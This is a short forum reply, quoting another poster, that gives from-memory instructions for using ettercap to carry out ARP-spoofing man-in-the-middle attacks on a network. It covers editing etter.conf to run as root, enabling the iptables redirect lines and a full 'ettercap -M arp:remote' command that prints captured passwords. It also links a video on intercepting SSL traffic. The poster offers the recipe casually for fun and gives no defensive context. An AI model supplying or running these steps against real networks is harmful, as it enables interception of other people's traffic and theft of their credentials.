Quote:
Originally Posted by Abracadabra
In that case it worked perfectly and it was decrypted in plain text...... 
|
If you didn't get the password or login, what was the point? Just use ettercap, in fact I did it just today for fun (ah, how nerdy).
Off of memory:
edit etter.conf (use locate)
set UID and GID to 0
look for iptables under "Linux" and uncomment both lines
ettercap -T -q -i whateverinterface -M arp:remote // //
Use ettercap -I to find out what interface you can use.
This will print any passwords that are captured to stout.
Read a tutorial on ettercap, you can do some crazy things.
Try here
http://www.iljya.com/projects/SSLVideo/
P.S. Some one correct me if I'm wrong above.